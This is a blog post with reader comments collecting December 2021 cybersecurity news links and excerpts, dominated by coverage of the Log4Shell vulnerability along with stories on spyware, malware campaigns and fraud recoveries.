This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
China suspends deal with Alibaba for not sharing Log4j 0-day first with the government https://thehackernews.com/2021/12/china-suspends-deal-with-alibaba-for.html
China’s internet regulator, the Ministry of Industry and Information Technology (MIIT), has temporarily suspended a partnership with Alibaba Cloud, the cloud computing subsidiary of e-commerce giant Alibaba Group, for six months on account of the fact that it failed to promptly inform the government about a critical security vulnerability affecting the broadly used Log4j logging library.
Tomi Engdahl says:
Dridex malware trolls employees with fake job termination emails https://www.bleepingcomputer.com/news/security/dridex-malware-trolls-employees-with-fake-job-termination-emails/
A new Dridex malware phishing campaign is using fake employee termination emails as a lure to open a malicious Excel document, which then trolls the victim with a season’s greeting message.
Tomi Engdahl says:
Microsoft Confirms ‘NotLegit’ Azure Flaw Exposed Source Code Repositories
https://www.securityweek.com/microsoft-confirms-notlegit-azure-flaw-exposed-source-code-repositories
Microsoft has quietly started notifying some Azure customers that a serious security vulnerability in the Azure App Service has caused the exposure of hundreds of source code repositories.
Microsoft’s confirmation comes more than two months after it was reported by Israeli cloud security startup Wiz and weeks after Redmond quietly patched the flaw and released notifications to “a limited subset of customers” believed to be at risk.
Tomi Engdahl says:
Poland Rejects Accusations of ‘Political’ Spyware Use
https://www.securityweek.com/poland-rejects-accusations-political-spyware-use
Poland on Tuesday rejected accusations that it had used Pegasus spying software for political ends after a top lawyer opposed to the current government said he had been targeted.
“The suggestion that Polish services used operational methods for political ends is unjustified,” said Stanislaw Zaryn, spokesman for the ministry in charge of the secret services.
Roman Giertych, a lawyer involved in several cases against the ruling Law and Justice (PiS) party, told Gazeta Wyborcza that Poland was using the spyware “to fight the democratic opposition”.
Tomi Engdahl says:
After A Brazen $400 Billion Unemployment Funds Heist, The U.S. Secret Service Seized Back The Money From Criminals
https://www.forbes.com/sites/jackkelly/2021/12/22/after-a-brazen-400-billion-unemployment-funds-heist-the-us-secret-service-seized-back-the-money-from-criminals/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Valerie&sh=41890fca6f97
Estimates ranging from $100 billion to over $400 billion have been stolen from Covid-19 unemployment and other pandemic relief programs. The United States Labor Department reported that nearly $90 billion in unemployment benefits alone could have been paid improperly due to fraudulent activities, according to PBS NewsHour.
The U.S. Secret Service released data on Tuesday on its efforts to investigate acts of fraud that exploit Covid-19 relief funds. Investigations have resulted in the seizure of millions of dollars and have assisted in the return of approximately $2 billion.
Tomi Engdahl says:
Log4j (CVE-2021-44228) RCE Vulnerability Explained
https://www.youtube.com/watch?v=0-abhd-CLwQ
Walking through how the log4j CVE-2021-44228 remote code execution vulnerability works and how it’s exploited.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/
Tomi Engdahl says:
FBI: Another Zoho ManageEngine Zero-Day Under Active Attack
https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/
Tomi Engdahl says:
Security firm Blumira discovers major new Log4j attack vector
A basic Javascript WebSocket connection can trigger a local Log4j remote code attack via a drive-by compromise. Wonderful. Truly wonderful.
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
Tomi Engdahl says:
Apache releases new 2.17.0 patch for Log4j to solve denial of service vulnerability
The Apache Software Foundation published a new Log4j patch late on Friday after discovering issues with 2.16.
https://www.zdnet.com/article/apache-releases-new-2-17-0-patch-for-log4j-to-solve-denial-of-service-vulnerability/
Tomi Engdahl says:
New Log4j Attack Vector Discovered
Meanwhile, Apache Foundation releases third update to logging tool in 10 days to address yet another flaw.
https://www.darkreading.com/application-security/researchers-uncover-new-attack-vector-for-log4j-flaw
Tomi Engdahl says:
New Local Attack Vector Expands the Attack Surface of Log4j Vulnerability
https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html
Cybersecurity researchers have discovered an entirely new attack vector that enables adversaries to exploit the Log4Shell vulnerability on servers locally by using a JavaScript WebSocket connection.
“This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability,” Matthew Warner, CTO of Blumira, said. “At this point, there is no proof of active exploitation. This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.”
Tomi Engdahl says:
How to test if your Linux server is vulnerable to Log4j
https://www.techrepublic.com/article/how-to-test-if-your-linux-server-is-vulnerable-to-log4j/
Tomi Engdahl says:
Apache’s Fix for Log4Shell Can Lead to DoS Attacks
https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/
Tomi Engdahl says:
Original Fix for Log4j Flaw Fails to Fully Protect Against DoS Attacks, Data Theft
Organizations should upgrade ASAP to new version of logging framework released Tuesday by the Apache Foundation, security experts say.
https://www.darkreading.com/application-security/original-fix-for-log4j-flaw-fails-to-fully-protect-against-dos-attacks-data-theft
Tomi Engdahl says:
Log4Shell in broad use: Fukushima moment for cybersecurity
https://cybernews.com/security/log4shell-in-broad-use-fukushima-moment-for-cybersecurity/
Tomi Engdahl says:
https://www.uusiteknologia.fi/2021/12/16/log4j-ongelma-laajenee-paivityksia-jo-tyokaluihin/
Tomi Engdahl says:
Google Tool Joins Ferocious Hunt for Log4j Bug Updated “fuzzing” service now sleuthing after the Internet’s latest (and greatest?) vulnerability
https://spectrum.ieee.org/log4j-google?utm_campaign=RebelMouse&socialux=facebook&share_id=6840811&utm_medium=social&utm_content=IEEE+Spectrum&utm_source=facebook
A major bug in a widely-used piece of open source software called Log4j has thrown the IT world into pandemonium. The hole was not even made public a month ago (as of this writing), and yet it’s already been classified by Internet security analysts as among the biggest vulnerabilities in cybersecurity history.
By some estimates, for instance, some 93 percent of enterprise cloud computing environments around the world are affected. According to sources quoted in the Financial Times, as of Dec. 14, more than 1.2 million cyberattacks (at a rate of as much as 100 attacks per minute) had been observed—with no likely end in sight for, according to these sources at least, “months to come.”
Tomi Engdahl says:
Mars helicopter mission (which Apache says is powered byLog4j) overcomes separate network glitch to confirm new flight record
Ingenuity clocks up 30 minutes flying in the Martian skies
https://www.theregister.com/2021/12/16/ingenuity_mars_helicopter_log4j_network/
NASA has revealed that Ingenuity – the experimental helicopter sent to Mars with the Perseverance Rover – has clocked up a whole half-hour of flight in the Red Planet’s meanly thin atmosphere.
The ‘copter passed the thirty-minute mark during its 17th flight, on December 5, which sets a new record for the space agency.
But NASA was unsure of the craft’s status because of what the US agency has described as “an unexpected cutoff to the in-flight data stream as the helicopter descended toward the surface at the conclusion of its flight.”
NASA SAYS ITS MARS HELICOPTER DOES NOT HAVE THE LOG4J SECURITY FLAW
https://futurism.com/the-byte/mars-helicopter-log4j-flaw
Tomi Engdahl says:
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips
https://thehackernews.com/2021/12/researchers-uncover-new-coexistence.html
Tomi Engdahl says:
Bugs in billions of WiFi, Bluetooth chips allow password, data theft
https://www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/
Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component.
Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation.
However, these components often share the same resources, such as the antenna or wireless spectrum.
Tomi Engdahl says:
‘Extremely bad’ vulnerability found in widely used logging system
The Log4Shell exploit gives attackers a simple way to execute code on any vulnerable machine
https://www.theverge.com/2021/12/10/22828303/log4j-library-vulnerability-log4shell-zero-day-exploit
Tomi Engdahl says:
Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet
Minecraft is the first, but certainly not the last, app known to be affected.
https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
Tomi Engdahl says:
Malicious Notepad++ installers push StrongPity malware
https://www.bleepingcomputer.com/news/security/malicious-notepad-plus-plus-installers-push-strongpity-malware/
Tomi Engdahl says:
Cyberattack forces supermarket Spar to close some stores
The retailer has been forced to close a number of stores following what it describes as an “online” attack.
https://www.zdnet.com/article/a-cyber-attack-has-forced-supermarket-spar-to-close-some-stores/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/google-disrupts-massive-glupteba-botnet-sues-russian-operators/
Tomi Engdahl says:
Log4Shell Vulnerability
Take urgent action and proactively hunt for Log4Shell behaviors
https://www.splunk.com/en_us/cyber-security/log4shell-log4j-response-overview.html
Defending Against the Log4Shell Vulnerability
Log4Shell vulnerability in the popular Apache Log4j 2 is a critical zero-day vulnerability that enables bad actors to perform remote code execution (RCE). Log4j is used in frameworks such as Apache Struts 2, Apache Solr, Apache Druid and Apache Flink.
In many instances, system admins may not be aware that Log4j is being used in their environments, leaving thousands of applications and third-party services at risk.
Use GitHub data in Splunk to find Log4j in your projects.
https://youtu.be/oASCxWDTAQo
Tomi Engdahl says:
Apache found critical bugs in httpd web server
https://cybernews.com/news/apache-found-critical-bugs-in-httpd-web-server/
Apache, which name has been in the news for the past two weeks due to the severe vulnerability in the logging library, issued yet another update. This time, it has nothing to do with the Log4j vulnerability (dubbed Log4Shell).
Apache issued the patch addressing two CVE-numbered flaws affecting the httpd server. According to the cybersecurity company Sophos, which published a detailed report on the topic, Apache’s httpd is a large and capable server with myriad combinations of modules and options, making it both powerful and dangerous at the time.
Fortunately, Sophos noted, the open-source httpd product receives constant attention from its developers, getting regular updates that bring new features along with critical security patches.
The two vulnerabilities that got fixed this time:
CVE-2021-44790: Possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51
CVE-2021-44224: Possible NULL dereference or SSRF in forward proxy configurations in Apache HTTP Server 2.4.51 and earlier.
“These bugs might not be exposed in your configuration because they are part of optional run-time modules that you might not actually be using. But if you are using these modules, whether you realize it or not, you could be at risk of server crashes, data leakage, or even remote code execution,” Sophos said.
Tomi Engdahl says:
NVIDIA discloses applications impacted by Log4j vulnerability
https://www.bleepingcomputer.com/news/security/nvidia-discloses-applications-impacted-by-log4j-vulnerability/
NVIDIA has released a security advisory detailing what products are affected by the Log4Shell vulnerability that is currently exploited in a wide range of attacks worldwide.
After a thorough investigation, NVIDIA has concluded that the Log4j vulnerabilities do not impact the following products:
GeForce Experience client software
GeForceNOW client software
GPU Display Drivers for Windows
L4T Jetson Products
SHIELD TV
Log4Shell impact
While NVIDIA consumer applications are unaffected, some NVIDIA enterprise applications include Apache Log4j and need to be updated:
Nsight Eclipse Edition versions below 11.0 are vulnerable to CVE-2021-33228 and CVE-2021-45046 and are fixed in version 11.0 or later.
NetQ is vulnerable to CVE-2021-33228, CVE-2021-45046, and CVE-2021-45105 on versions 2.x, 3.x, and 4.0.x. As such, users are advised to upgrade to NetQ 4.1.0 or later.
vGPU Software License Server is impacted by CVE-2021-33228 and CVE-2021-45046 on versions 2021.07 and 2020.05 Update 1. The recommended practice in these cases is to follow this mitigation guide.
NVIDIA also warns that CUDA Toolkit Visual Profiler includes Log4j files but that the application is not using them. An updated version is being released in January 2022 to remove these files.
Tomi Engdahl says:
https://wiki.eclipse.org/Eclipse_and_log4j2_vulnerability_(CVE-2021-44228)
Tomi Engdahl says:
Windows 10 RCE: The exploit is in the link
https://positive.security/blog/ms-officecmd-rce
Tomi Engdahl says:
The ‘most serious’ security breach ever is unfolding right now. Here’s what you need to know.
Much of the Internet, from Amazon’s cloud to connected TVs, is riddled with the log4j vulnerability, and has been for years
https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/
On Dec. 9, word of a newly discovered computer bug in a hugely popular piece of computer code started rippling around the cybersecurity community. By the next day, nearly every major software company was in crisis mode, trying to figure out how their products were affected and how they could patch the hole.
“The log4j vulnerability is the most serious vulnerability I have seen in my decades-long career,” Jen Easterly, U.S. Cybersecurity and Infrastructure Security Agency director, said in a Thursday interview on CNBC.
Reports differ when it comes to who first raised the alarm about the vulnerability. Some people say it surfaced in a forum dedicated to the video game Minecraft. Others point to a security researcher at Chinese tech company Alibaba. But experts say it’s the biggest software vulnerability of all time in terms of the number of services, sites and devices exposed.
Software bugs crop up all the time. Why is this one different?
Return to menu
The fact that log4j is such a ubiquitous piece of software is what makes this such a big deal. Imagine if a common type of lock used by millions of people to keep their doors shut was suddenly discovered to be ineffective. Switching a single lock for a new one is easy, but finding all the millions of buildings that have that defective lock would take time and an immense amount of work.
Log4j is part of the Java programming language, which is one of the foundational ways software has been written since the mid-90s. Huge swaths of the computer code that modern life runs on use Java and contain log4j. Cloud storage companies such as Google, Amazon and Microsoft, which provide the digital backbone for millions of other apps, are affected. So are giant software sellers whose programs are used by millions, such as IBM, Oracle and Salesforce. Devices that connect to the Internet such as TVs and security cameras are at risk as well.
In the Minecraft video game, it’s as easy as typing a line of malicious code into the public chat box during a game. On Twitter, some people changed their display names to strings of bad code, Wired reported.
The vulnerability also gives hackers access to the heart of whatever system they’re trying to get into, cutting past all the typical defenses software companies throw up to block attacks. Overall, it’s a cybersecurity expert’s nightmare.
So how is the tech industry responding?
Return to menu
Computer programmers and security experts have been working night and day since the vulnerability was publicized to fix it in whatever piece of software they’re responsible for. At Google alone, more than 500 engineers had been going through reams and reams of code to make sure it was safe, according to one employee. That process was being repeated at all kinds of tech companies, spawning an entire new genre of memes from coders lamenting the hellish week they’ve been through.
“Some of the people didn’t see sleep for a long time, or they sleep like three hours, four hours and wake back up,” Ashkenazi said. “We were working around-the-clock. It’s a nightmare since it was out. It’s still a nightmare.”
Are hackers already taking advantage of it?
Return to menu
Hackers have been working just as hard as the security experts to exploit log4j before the bug gets patched. Cybersecurity software company Check Point said in a blog post that it saw hackers send out 60 different variations of the original exploit in a single 24-hour period. Hackers have already tried to use it to get into nearly half of all corporate networks around the world, Check Point said. Most of the hacking has focused on hijacking computers to run bitcoin mining software
Though the bug was present for years, it’s unlikely criminal hackers have known about it until now, because if they had, security experts would have spotted it being used before
That doesn’t mean that more sophisticated government hackers, such as those working for the United States, Russia, Israel or China, haven’t used it before though
On Dec. 17, cybersecurity firm AdvIntel said it detected well-known ransomware gang Conti scanning the web for log4j and then launching an attack of its own.
And not everyone will fix the problem in the first place. Getting an entire industry to update a specific piece of software quickly is next to impossible. Many companies won’t end up doing it, or will think they aren’t affected when really they are.
That means log4j could be a problem for years to come.
The best thing regular computer users can do is make sure the apps they use are updated to their most recent versions
For the most part, consumers should just wait and let the experts fix their software programs.
“Sit back, take a deep breath. It’s not the end of the world,” Malik said. “It’s going to be very busy the next few days for security folks.”
Correction: A previous version of this story incorrectly stated that NASA’s Ingenuity helicopter used log4j.
Tomi Engdahl says:
Google warns that NSO hacking is on par with elite nation-state spies
ForcedEntry is “one of the most technically sophisticated exploits.”
https://arstechnica.com/information-technology/2021/12/google-warns-that-nso-hacking-is-on-par-with-elite-nation-state-spies/
Tomi Engdahl says:
https://arstechnica.com/information-technology/2021/12/google-warns-that-nso-hacking-is-on-par-with-elite-nation-state-spies/
Tomi Engdahl says:
Google Issues Warning For 2 Billion Chrome Users
https://www.forbes.com/sites/gordonkelly/2021/12/23/google-chrome-update-warning-new-chrome-version-100/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Valerie&sh=196b366d3c35
Chrome remains under (unprecedented) attack from all sides this year, and now Google has confirmed a new problem that Chrome’s two billion+ users need to know about.
Google revealed the news via its Chromium Bug tracker, the codebase for Chrome, confirming that the browser’s next major landmark release is set to break a number of websites around the world. And there’s nothing you can do about it.
The problem boils down to version numbers. The official build of Chrome is currently on version 96, while ‘Chrome Canary’ — the early access developer build — is already on version 99. When Chrome hits 100, affected websites will stop loading.
The reason for this is these sites check the version of Chrome visiting the site, but website design software like Duda only check the first two digits. The check is for security reasons to stop older, unsupported versions of Chrome from visiting (version 40 and older is a common cut-off point) and Chrome 100 will be read as ‘Chrome 10’ and blocked.
Finding a fix is tricky and time is running out. From the perspective of website owners, many will not know they are affected until it is too late with potentially significant fallout. From Google’s perspective, Chrome also continues to race through version numbers as the company develops its browser at a breakneck pace. For example, Chrome 95 only launched in October.
Tomi Engdahl says:
“It’s Open Source!”, “It’s roubust and secure” , “With the Java platform we can do anything”
Merry Christmas from
/Log4j
JavaZone 2012: The Java Heist
https://m.youtube.com/watch?v=HXvm76e2X1Q&feature=youtu.be
Tomi Engdahl says:
CyberNews caught up with Peter Rydzynski, principal threat Analyst for IronNet Cybersecurity, to discuss how the situation has developed over the past two weeks.
Log4j: protecting only remotely accessible servers is a mistake – opinion
https://cybernews.com/security/log4j-protecting-only-remotely-accessible-servers-is-a-mistake-opinion/?utm_source=facebook&utm_medium=social&utm_campaign=cybernews&utm_content=post
It’s been almost two weeks since the severe vulnerability in the Log4j logging library was publicly disclosed. We are starting to see more severe consequences, but the problem hasn’t yet peaked.
Since the beginning of the public debate on the vulnerability, dubbed Log4Shell, experts have been speculating that this is the Fukushima moment for cybersecurity. They anticipate that the consequences might be severe, but we might not learn about the magnitude of this cybersecurity earthquake for months.
It’s been almost two weeks since the severe vulnerability in the Log4j logging library was discovered. What happened during that period? How bad is it?
Firstly, the reason it is so severe is partially because of the ubiquitous use of Java applications all over the place, and, additionally, the use of the Log4j library, specifically, within Java applications. Given the fact that it is used in so many locations, and then combined with the fact that, in this case, the exploit was incredibly trivial. You could even show the exploit strain to someone who wasn’t in computer science or computer security. They could probably understand basically what it does and how it can figure it to do something they want it to do. Very simple to execute. Additionally, the delivery mechanism, because you could deliver the exploit from remote areas of the internet, also made it incredibly severe.
As all things go, patch processes took place, we had a fixed version of Log4j that was released, and almost immediately, we found out that version was still vulnerable. And so, it was a typical game of every time you think you are good, and you’ve patched up to a particular version that’s secure, you are still not secure. And we are chasing this vulnerability all the way to the point where they actually deactivated the feature entirely. That vulnerable feature has now been completely removed from the Log4j library.
Does the fact that it is disabled prevent you from cyberattacks?
Just because there is a secure version doesn’t mean it is easy to get to that version, and it also doesn’t mean that it is easy for you to know where all of the Log4j applications are in your network.
What happened during these past weeks? We saw crypto miners starting to exploit the vulnerability, nation-states jumping in, ransomware gangs eyeing the vulnerability, and even the Belgian defense ministry falling victim to a cyberattack allegedly caused by this vulnerability.
I think that more will definitely come to light as time goes on because, with these kinds of exploitations, you see very rapid adoption by botnets and crypto mining. And we definitely saw that. We saw things attempting to spread across the internet like Mirai that have done that for a long time using similar exploits. They have picked this up quickly. But nation-states and more sophisticated actors need a little bit of time to work these new exploits into their operations and for those things to come to light. I think we are going to see more of that. We are seeing now that the Conti ransomware group has adopted this exploit in their operations, so that’s another concern: that ransomware is absolutely a viable delivery here. Because given the nature of the exploit, you are often going to land on a server that isn’t being monitored as heavily as maybe a host end-point. Additionally, that may have more broad access into the network and move laterally very easily from that landing point on a server. Ransomware is a strong concern here.
But even those companies that have patched might still be vulnerable as the attacker might already be inside their network, right?
Another concern here is not just that an attacker had already exploited your server and moved on to other locations within your network before you were able to patch. Still, a bigger concern is actually on the side of information stealing. People may think that they are ok because they didn’t see any subsequent command-and-control activity or lateral movement, but what they didn’t realize is that the attacker used the DNS mechanism that’s capable within this exploit and exfiltrated sensitive environment variables that include passwords that an attacker can use later to come back and attack your network at their pleasure.
There are a lot of angles to this. Just patching and thinking that you are safe after having a server exposed to the internet is not a good idea.
You’ve mentioned that sophisticated threat actors might need time to fit this vulnerability into their attack vectors. On average, it takes 14 weeks even to detect an intruder. Does it mean that we are yet to learn about the significance and severity of this vulnerability, as well as the actual damage it caused?
I believe that they are ongoing. At the moment, we’ve already had indications that nation-states are leveraging this exploit, but I will say that we might never learn about these kinds of attacks in full scope. But yes, these things take time. If you look at any of the reports out of Mandiant, FireEye, and other organizations that do incident response for the government, you will notice that these reports typically come six to nine months after the activity was discovered by defensive companies, let alone when the activity started in those networks. These things take time, and, additionally, we may not actually hear the full scope of them as well.
You should essentially have plans to ensure that you have the appropriate processes documented so that when you discover a threat actor in your network, you can take action. Furthermore, you need to have monitoring systems that pay attention to the internal portions of your network. You can’t just watch the edge, and you can’t just watch the firewall and say, ‘hey, we saw these Log4j exploits, but we’ve patched them, and we are good,’ and then not take a look inside and start monitoring traffic, hosts, looking for lateral movement, looking for the second-stage activities that are going to happen after an exploit is successful on your edge.
Again, this is something you should be doing all the time, not just because Log4j is happening now, but you can see how important it is to have adopted this strategy all the time when Log4j happens.
Do you think enough companies are patching the vulnerability? We saw with the Microsoft Exchange Servers that there were still tens of thousands of unpatched servers weeks after discovering the bug.
I think the attention on this particular incident has been incredible. I think that a good majority of people are patching. But I will speculate on as far as my fears go. People think the edges are the priority, which they are. They believe that anything that can be hit from the internet should be patched, but the inside can wait. And what happens is sometimes those things would get forgotten or even intentionally overlooked because they will be assumed as a risk that is not big enough to take action on. I hope that doesn’t happen because this is a goldmine for an attacker who’s already in the network.
It might be tempting for defenders to say, ‘that’s not remotely accessible, no one’s going to attack that server, it’s only accessible to internal employees, it’s no big deal.’ In reality, an attacker could very simply access and exploit a server inside the network. You might think that it is not a priority, but I think it is a priority across every portion of your network, even the most sensitive enclaves that are restricted access only.
Tomi Engdahl says:
Half-Billion Compromised Credentials Lurking on Open Cloud Server
https://threatpost.com/half-billion-compromised-credentials-cloud-server/177202/
A quarter-billion of those passwords were not seen in previous breaches that have been added to Have I Been Pwned.
According to the National Crime Agency’s National Cyber Crime Unit in the U.K., nearly 586 million sets of credentials had been collected in a compromised cloud storage facility, free for the taking by any cybercrime yahoo who happened to stop by.
The credentials were a mixed bag in terms of sources, and it’s not clear how these passwords became compromised.
Tomi Engdahl says:
https://thehackernews.com/2021/12/new-mobile-network-vulnerabilities.html?m=1
Researchers have disclosed security vulnerabilities in handover, a fundamental mechanism that undergirds modern cellular networks, which could be exploited by adversaries to launch denial-of-service (DoS) and man-in-the-middle (MitM) attacks using low-cost equipment.
The “vulnerabilities in the handover procedure are not limited to one handover case only but they impact all different handover cases and scenarios that are based on unverified measurement reports and signal strength thresholds,” researchers Evangelos Bitsikas and Christina Pöpper from the New York University Abu Dhabi said in a new paper. “The problem affects all generations since 2G (GSM), remaining unsolved so far.”
Tomi Engdahl says:
China “Data Trap” – One way is to own the market. Tik Tok is now visited more than Google or Facebook.
” nation-state actors like China, which seeks access to strategic data and seeks to use it to develop a toolkit against its adversaries. Last month, MI6 chief Richard Moore described the threat of China’s “data trap”: “If you allow another country to gain access to really critical data about your society,” Moore argued, “over time that will erode your sovereignty, you no longer have control over that data.” And most governments are only just beginning to grasp this threat.”
https://techcrunch.com/2021/12/26/how-to-avoid-falling-into-chinas-data-trap/
Tomi Engdahl says:
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations https://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j a reflection of its impact. Further expanding the attack surface, the vulnerability, dubbed Log4Shell, affects even embedded devices that use this library. In this report, we focus on the devices or properties found in or used for cars, specifically chargers, in-vehicle infotainment (IVI) systems, and “digital remotes”
for opening cars.
Tomi Engdahl says:
Apple fixes macOS security flaw behind Gatekeeper bypass https://www.bleepingcomputer.com/news/apple/apple-fixes-macos-security-flaw-behind-gatekeeper-bypass/
Apple has addressed a macOS vulnerability that unsigned and unnotarized script-based apps could exploit to bypass all macOS security protection mechanisms even on fully patched systems. Once malicious script-based apps targeting the bypass flaw (CVE-2021-30853) are launched on a target’s system, they can be used by attackers to download and deploy second-stage malicious payloads. Apple has addressed this vulnerability in macOS 11.6 through a security update released in September 2021 that adds improved checks.
Tomi Engdahl says:
Noora, 35, oli menettää 6000 euroa hetkessä näin toimii Suomessa leviävä salakavala huijaus
https://www.iltalehti.fi/tietoturva/a/726d5a13-3123-4060-bf50-0f3a7048f090
Eri pankkien nimissä liikkuu todella paljon huijausviestejä.
Huijausviestit tulevat tavallisesti sähköpostitse ja niissä väitetään, että vastaanottajalla on kiire korjata jokin havaittu ongelma tai tehdä tärkeä allekirjoitus. Näillä viesteillä kalastellaan henkilötietoja, luottokorttitietoja sekä pankkitunnuksia. Tällaisen viestin sai myös 35-vuotias Noora Juvonen. OP:n nimissä lähetetyn viestin aiheena oli “turvallisuushälytys” ja siinä kerrottiin, että Juvosen suojattuun postilaatikkoon oli saapunut tärkeä viesti, jonka voisi katsoa kirjautumislinkin kautta.
Tomi Engdahl says:
Stealthy BLISTER malware slips in unnoticed on Windows systems https://www.bleepingcomputer.com/news/security/stealthy-blister-malware-slips-in-unnoticed-on-windows-systems/
Security researchers have uncovered a malicious campaign that relies on a valid code-signing certificate to disguise malicious code as legitimate executables. One of the payloads that the researchers called Blister, acts as a loader for other malware and appears to be a novel threat that enjoys a low detection rate.
Tomi Engdahl says:
NSO spyware used to hack Polish politicians, Khashoggi’s wife, others
https://www.zdnet.com/article/nso-spyware-used-to-hack-polish-politicians-wife-of-khashoggi-un-war-crimes-investigator-and-more/#ftag=RSSbaffb68
Spyware from Israeli tech company NSO Group has been implicated in the hack of a leading opposition politician in Poland and several others, according to University of Toronto nonprofit Citizen Lab. In partnership with the Associated Press, Citizen Lab revealed on Thursday that Polish Senator Krzysztof Brejza was hacked using NSO Group’s Pegasus spyware 33 times between April 26, 2019 and October 23, 2019.
Tomi Engdahl says:
Researchers Disclose Unpatched Vulnerabilities in Microsoft Teams Software https://thehackernews.com/2021/12/researchers-disclose-unpatched.html
Microsoft said it won’t be fixing or is pushing patches to a later date for three of the four security flaws uncovered in its Teams business communication platform earlier this March. The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could “allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and DoS’ing their Teams app/channels.”
Tomi Engdahl says:
Fisher-Price’s Chatter phone has a simple but problematic Bluetooth bug https://techcrunch.com/2021/12/22/chatter-phone-bluetooth-bug/
As nostalgia goes, the Fisher-Price Chatter phone doesn’t disappoint.
The classic retro kids toy was given a modern revamp for the holiday season with the new release for adults which, unlike the original toy designed for kids, can make and receive calls over Bluetooth using a nearby smartphone. The Chatter didn’t spend long on sale; the phone sold out quickly as the waitlists piled up. But security researchers in the U.K. immediately spotted a potential problem. With just the online instruction manual to go on, the researchers feared that a design flaw could allow someone to use the Chatter to eavesdrop.
Tomi Engdahl says:
Android banking trojan spreads via fake Google Play Store page https://www.bleepingcomputer.com/news/security/android-banking-trojan-spreads-via-fake-google-play-store-page/
An Android banking trojan targeting Ita Unibanco, a large financial services provider in Brazil with 55 million customers globally, has deployed an unusual trick to spread to devices. The actors have set up a page that looks very close to Android’s official Google Play app store to trick visitors into thinking they are installing the app from a trustworthy service. See also:
https://blog.cyble.com/2021/12/23/malicious-app-targets-major-brazilian-bank-itau-unibanco/
Tomi Engdahl says:
Blackmagic fixes critical DaVinci Resolve code execution flaws https://www.bleepingcomputer.com/news/security/blackmagic-fixes-critical-davinci-resolve-code-execution-flaws/
Blackmagic Software has recently addressed two security vulnerabilities in the highly popular DaVinci Resolve software that would allow attackers to gain code execution on unpatched systems. The two remote code execution (RCE) security flaws, tracked as
CVE-2021-40417 and CVE-2021-40418, were discovered by Cisco Talos security researchers and are rated with a CVSSv3 severity score of 9.8/10. They’re both caused by weaknesses found in DaVinci Resolve’s DPDecoder service and are triggered by a heap-based buffer overflow when decoding a video file or an incorrect UUID when parsing video files.
Tomi Engdahl says:
FBI traces and grabs back $150 million theft that was turned into bitcoins https://blog.malwarebytes.com/crypto/2021/12/fbi-traces-and-grabs-back-150-million-theft-that-was-turned-into-bitcoins/
On December 1, 2021, the Tokyo police arrested an employee of Sony Life Insurance on suspicion of fraudulently obtaining 17 billion yen through an illegal money transfer from an overseas unit. The funds were embezzled by Sony employee Rei Ishii, who pretending to conduct a legal fund transfer in May 2021. He allegedly transferred the money from SA Reinsurance Ltd’s bank account to a different bank account overseas, by falsifying transaction instructions, which caused the funds to be transferred to an account that Ishii controlled at a bank in La Jolla, California. He then quickly converted the funds to bitcoins, as criminals do.